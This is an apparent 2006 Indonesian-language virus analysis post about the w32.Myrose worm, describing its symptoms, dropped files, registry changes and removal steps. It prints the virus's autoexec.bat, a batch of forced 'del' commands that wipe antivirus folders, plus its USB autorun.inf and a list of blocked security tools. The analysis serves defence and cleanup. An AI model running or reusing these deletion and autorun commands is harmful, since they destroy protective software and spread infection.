Hacking/Cracking : Analisa virus w32.MYROSE Posted by admin on 2006/11/8 22:01:59 (484 reads) Hei yo� ketemu lagi ama kita di virologi��. Setelah sekian lama gak diuplot ni website akhirnya dey... kita mengadakan penguplotan tentang virus my rose ... emang mungkin udah agak lama yah untuk dibahas...Cuma apa salahnya...analisis lageeeeeeeee...... Nama virus : w32.Myrose@A Nilai crc32 : 5BE4283 Besar file : 56 kb Build : VB 6.0 CIRI � CIRI Ciri � ciri komputer yang terkena virus ini, pasti tau dunks �. IYA BENERRRRR.... kata � kata mutiara muncul di komputer anda, sebelum anda login ke komputer ... bagus � bagus loh.... bisa dicontek buat ngerayu awewek awewek ... kayak temen saya yang lagi nelpon di disamping ini : "Hiduplah seperti lilin menerangi orang lain, janganlah hidup seperti duri menusuk diri dan menyakiti" "Mahkota kemanusiaan ialah rendah hati" "Kawan sejati ialah orang yang mencintaimu meskipun telah mengenalmu dengan sebenar-benarnya yaitu ba" "Yang telah berlalu biarkan ia berlalu, yang mendatang hadapi dengan cemerlang" "Seekor burung di tangan lebih baik daripada sepuluh ekor di atas pohon." "Hidup ini adalah warna-warni yang tergores pada kanvas, walaupun tidak cantik ia tetap mempunyai sej" "Sebelum memberi nasihat kepada manusia dengan ucapanmu, berilah mereka nasihat dengan perbuatanmu." "Harta yang paling menguntungkan ialah SABAR. Teman yang paling akrab adalah AMAL." " Pengawal peribadi yang paling waspada DIAM. Bahasa yang paling manis SENYUM. Dan ibadah yang paling" "Apabila kepercayaan telah hilang lenyap, kehormatan telah musnah, maka matilah orang itu -Whittier" "Jangan sekali-kali kita meremehkan sesuatu perbuatan baik walaupun hanya sekadar senyuman." "Anda bukan apa yang anda fikirkan tentang anda, tetapi apa yang anda fikirkan itulah anda" "Hidup tak selalunya indah tapi yang indah itu tetap hidup dalam kenangan." "Biarpun jalan itu panjang, kita akan merintisnya perlahan-lahan." "Dalam kerendahan hati ada ketinggian budi. Dalam kemiskinan harta ada kekayaan jiwa. Dalam kesempita" "Kegagalan dalam kemuliaan lebih baik daripada kejayaan dalam kehinaan." "Berfikir sejenak, merenung masa lalu adalah awal yang baik untuk bertindak" "Seseorang yang melakukan kesalahan dan tidak membetulkannya, Sesungguhnya Ia telah melakukan satu ke" "Selemah-lemah manusia ialah orang yg tak bisa mencari sahabat dan orang yang lebih lemah dari itu ia" "Ambillah waktu untuk berfikir, itu adalah sumber kekuatan. " "Ambillah waktu untuk bermain, itu adalah rahsia dari masa muda yang abadi. " "Ambillah waktu untuk berdoa, itu adalah sumber ketenangan. " "Ambillah waktu untuk belajar, itu adalah sumber kebijaksanaan. " "Ambillah waktu untuk mencintai dan dicintai, itu adalah hak istimewa yang
diberikan "Ambillah "Ambillah "Ambillah "Ambillah "Ambillah
Tuhan. " waktu untuk waktu untuk waktu untuk waktu untuk waktu untuk
bersahabat, itu adalah jalan menuju kebahagiaan. " tertawa, itu adalah musik yang menggetarkan hati. " memberi, itu adalah membuat hidup terasa bererti. " bekerja, itu adalah nilai keberhasilan. " beramal, itu adalah kunci menuju syurga. "
Deu����.. bikin nangis kan��. Hiks hiks
FILE INDUK VIRUS File induk virus berada di direktori C:\Windows\System32\12053, nama file tersebut adalah : -
svchost.exe lsass.exe data.exe New Folder.exe
Selain itu virus juga membentuk file � file virus tambahan berupa nama folder dengan icon folder berwarna kuning. Ya pokoknya sama seperti brontok, tapi besarnya 56 kb. MEMBLOK PROGRAM List program yang di-blok virus ini adalah : -
cmd.exe command.com ntvdm.exe msconfig.exe procexp.exe HijackThis.exe Rstrui.exe Notepad.exe Regedit.exe Taskmgr.exe Killbox.exe
MERUBAH FILE EXE DI DIREKTORI PROGRAM FILES Ini yang paling nyebelin....jadi virus akan merubah file eksekusi atau file program yang ada di direktori Program Files, jadi misalnya anda menginstal Microsoft Office di komputer anda, maka file word.exe yang menjadi file eksekusi Winword akan diganti file virus berupa file berekstensi .exe berwarna kuning. MEMBACKUP SENDIRI FILE MSVBVM60.DLL Karena virus ini dibuat dari VB (emang kuehhh) maka beliau harus mengadakan backup file terpenting yaitu MSVBVM60.DLL. Jika ingin melihat file � file backup tersebut ada di direktori C:\Windows\System32\12053 MEMBENTUK FILE LAIN
Virus ini membentuk file lain, yaitu autoexec.bat dengan isi : del del del del del del del del del del del del del del del del del del del del del del del del del del del del del del del del del del del del del del del del del del del del del del del del del del del del del del del
/f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f
/q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q
/s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s
E:\ESET\*.* >nul E:\antivi~1\*.* >nul E:\antivi~2\*.* >nul E:\antiviru\*.* >nul E:\avg\*.* >nul E:\kasper~1\*.* >nul E:\kasper~2\*.* >nul E:\mcafee\*.* >nul E:\mcafee.com\agent\*.* >nul E:\mcafee.com\*.* >nul E:\mcafee.com\VSO\*.* >nul E:\mcafee~1\*.* >nul E:\msav\*.* >nul E:\norman\*.* >nul E:\norton~1\*.* >nul E:\norton~2\*.* >nul E:\pav\*.* >nul E:\pccill~1\*.* >nul E:\pc-cil~1\*.* >nul E:\progra~1\ESET\*.* >nul E:\progra~1\antivi~1\*.* >nul E:\progra~1\antivi~2\*.* >nul E:\progra~1\avg\*.* >nul E:\progra~1\kasper~1\*.* >nul E:\progra~1\kasper~2\*.* >nul E:\progra~1\mcafee\*.* >nul E:\progra~1\McAfee.com\agent\*.* >nul E:\progra~1\McAfee.com\\*.* >nul E:\progra~1\McAfee.com\VSO\*.* >nul E:\progra~1\mcafee~1\*.* >nul E:\progra~1\mindso~1\*.* >nul E:\progra~1\norman\*.* >nul E:\progra~1\norton~1\*.* >nul E:\progra~1\norton~2\*.* >nul E:\progra~1\pandas~1\*.* >nul E:\Progra~1\Alwils~1\*.* >nul /a:h E:\ESET\*.* >nul /a:h E:\antivi~1\*.* >nul /a:h E:\antivi~2\*.* >nul /a:h E:\antiviru\*.* >nul /a:h E:\avg\*.* >nul /a:h E:\kasper~1\*.* >nul /a:h E:\kasper~2\*.* >nul /a:h E:\mcafee\*.* >nul /a:h E:\mcafee.com\agent\*.* >nul /a:h E:\mcafee.com\VSO\*.* >nul /a:h E:\mcafee~1\*.* >nul /a:h E:\msav\*.* >nul /a:h E:\norman\*.* >nul /a:h E:\norton~1\*.* >nul /a:h E:\norton~2\*.* >nul /a:h E:\pav\*.* >nul /a:h E:\pccill~1\*.* >nul /a:h E:\pc-cil~1\*.* >nul /a:h E:\progra~1\ESET\*.* >nul
del del del del del del del del del del del del del del del del del del del del del del del del del del del del del del del del del del del del del del del del del del del del del del del del del del del del
/f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f /f
/q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q /q
/s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s /s
/a:h /a:h /a:h /a:h /a:h /a:h /a:h /a:h /a:h /a:h /a:h /a:h /a:h /a:h /a:h /a:h /a:R /a:R /a:R /a:R /a:R /a:R /a:R /a:R /a:R /a:R /a:R /a:R /a:R /a:R /a:R /a:R /a:R /a:R /a:R /a:R /a:R /a:R /a:R /a:R /a:R /a:R /a:R /a:R /a:R /a:R /a:R /a:R /a:R /a:R /a:R /a:R
E:\progra~1\antivi~1\*.* >nul E:\progra~1\antivi~2\*.* >nul E:\progra~1\avg\*.* >nul E:\progra~1\kasper~1\*.* >nul E:\progra~1\kasper~2\*.* >nul E:\progra~1\mcafee\*.* >nul E:\progra~1\mcafee.com\agent\*.* >nul E:\progra~1\mcafee.com\*.* >nul E:\progra~1\mcafee.com\VSO\*.* >nul E:\progra~1\mcafee~1\*.* >nul E:\progra~1\mindso~1\*.* >nul E:\progra~1\norman\*.* >nul E:\progra~1\norton~1\*.* >nul E:\progra~1\norton~2\*.* >nul E:\progra~1\pandas~1\*.* >nul E:\Progra~1\Alwils~1\*.* >nul E:\ESET\*.* >nul E:\antivi~1\*.* >nul E:\antivi~2\*.* >nul E:\antiviru\*.* >nul E:\avg\*.* >nul E:\kasper~1\*.* >nul E:\kasper~2\*.* >nul E:\mcafee\*.* >nul E:\mcafee.com\agent\*.* >nul E:\mcafee.com\*.* >nul E:\mcafee.com\VSO\*.* >nul E:\mcafee~1\*.* >nul E:\msav\*.* >nul E:\norman\*.* >nul E:\norton~1\*.* >nul E:\norton~2\*.* >nul E:\pav\*.* >nul E:\pccill~1\*.* >nul E:\pc-cil~1\*.* >nul E:\progra~1\ESET\*.* >nul E:\progra~1\antivi~1\*.* >nul E:\progra~1\antivi~2\*.* >nul E:\progra~1\avg\*.* >nul E:\progra~1\kasper~1\*.* >nul E:\progra~1\kasper~2\*.* >nul E:\progra~1\mcafee\*.* >nul E:\progra~1\mcafee.com\*.* >nul E:\progra~1\mcafee.com\agent\*.* >nul E:\progra~1\mcafee.com\VSO\*.* >nul E:\progra~1\mcafee~1\*.* >nul E:\progra~1\mindso~1\*.* >nul E:\progra~1\norman\*.* >nul E:\progra~1\norton~1\*.* >nul E:\progra~1\norton~2\*.* >nul E:\progra~1\pandas~1\*.* >nul E:\Progra~1\Alwils~1\*.* >nul
Hih ngeri kan �. Perintah dalam autoexec.bat ini akan menghapus program file yang ada di windows, terutama file antivirus� MENYEMBUNYIKAN FOLDER WINDOWS
Iya tuh karena perintah di bawah ini, folder windows anda akan disembunyikan oleh virus ini: 0041D8EE . 68 847D4000 PUSH unpacked.00407D84 ; UNICODE "attrib +h " jadi jangan panic jika anda tidak menemukan folder windows�gak ilang kok�Cuma disembunyiin� Untuk memunculkan kembali cukup ikuti langkah berikut: 1. Hajar proses yang bernama svchost.exe dan lsass.exe memakai showkillprocess.exe yang bisa di donlot di www.virologi.info/download 2. Kemudian jalankan WAV 2005, scan salah satu direktory terserah apa saja.. 3. Buka Windows Explorer, klik drive di mana anda menginstall windows ... nah udah ada kan, tapi dengan attribut hidden 4. Untuk mengembalikannya cukup klik kanan->Properties->hilangkan centang atau check pada tulisan Hidden MANIPULASI FLASHDISK Jika anda menancapkan flashdisk di komputer yang terkena virus w32.myrose ini, maka icon flashdisk anda akan berubah, karena virus menulis file autorun.inf di flashdisk anda dengan isi sbb: [autorun] OPEN=loren.ico ICON=loren.ico,0 Dan membentuk file loren.ico dengan perintah sbb: "0000000AA7A7A7A74BBB7BBBB00000000000000A7AAAAA7A4B7BBBBBB000" "0000000000AA222A2A244BBB7B7B7B000000000000222222A244BB7BBBBB" "BB00000000000222222224447BBB7B7B7B0000000000C8222222244BB9B9" B9BBBB000000000C8C828222444B9B9B9B9B7B00000000CCC82822224449" B9B9B9B9BB0000000CCCCC828220449B9B9B9B9B99000000CCCCC8C82824" 44B9B9B9B9B9B9000000CCCCCCCC82844B9B9B9B9B9B9900000CCCCCCCCC" C84449B9B9B9B9B9B90000CCCCCCCCCCCC44999B9B9B9B9B999000CCCCCC" CCCCC00499999999B99999900CCCCCCCCCCC000099999999999999900CCC" CCCCCCC0000099999999999999900CCCCCCCC00000000999999999999990" 0CCCCCC000000000009999999999999000CC000000000000000999999999" Di atas itu apaan sih?pasti anda bertanya tanya, itu adalah nilai hexa dari icon loren.ico, yang ditulis melalui program virus tadi... MANIPULASI REGISTRY Registry yang dimanipulasi oleh virus ini: Registry untuk memblok Run, Search HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Program Manager\Restrictions, NORun HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Program Manager\Restrictions,Noclose
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Program Manager\Restrictions,NofileMenu HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Program Manager\Restrictions,NoSaveSettings HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Program Manager\Restrictions,Restrictions Registry untuk menghilangkan menu Run, Search, Favorites HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartMenu\St artMenu\StartMenuChange HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartMenu\St artMenu\StartMenuFavorites HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartMenu\St artMenu\StartMenuLogoff HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartMenu\St artMenu\StartMenuRun Registry untuk menampilkan kata � kata mutiara HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, LegalNoticeCaption HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon,LegalNoticeText HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, System E:Windows\12053\svchost.exe MENGATASI VIRUS MYROSE 1. Download showkill process, atau jan_proc yang ada di www.virologi.info/download yang berguna untuk mematikan proses 2. Download WAV Beta 2005 yang ada di www.virologi.info/download yang berguna untuk mengembalikan regsitry 3. a. b. c. d.
Matikan proses : svchost.exe lsass.exe data.exe New Folder.exe
4. Hapus file induk virus yang ada di direktory c:\Windows\System32\12053 5. Hapus Manipulasi registry yang ada di alamat berikut HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Program Manager\Restrictions, NORun HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Program Manager\Restrictions,Noclose
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Program Manager\Restrictions,NofileMenu HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Program Manager\Restrictions,NoSaveSettings HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Program Manager\Restrictions,Restrictions Registry untuk menghilangkan menu Run, Search, Favorites HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartMenu\St artMenu\StartMenuChange HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartMenu\St artMenu\StartMenuFavorites HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartMenu\St artMenu\StartMenuLogoff HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartMenu\St artMenu\StartMenuRun Registry untuk menampilkan kata � kata mutiara HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, LegalNoticeCaption HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon,LegalNoticeText HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, System E:Windows\12053\svchost.exe 6. Jalankan WAV 2005 dengan update terbaru untuk melibas virus ini 7. Untuk meyakinkan cari file berekstensi .exe yang mempunyai icon folder berwarna kuning dan berukuran 56 kb, kemudian HAPUS... Semoga dapat membantu untuk yang terkena virus ini, temen saya udah bener2 laper so kita kudu cabut ke malioboro dulu buat beli sendal n makan...caow,,,,,... Aat Shadewa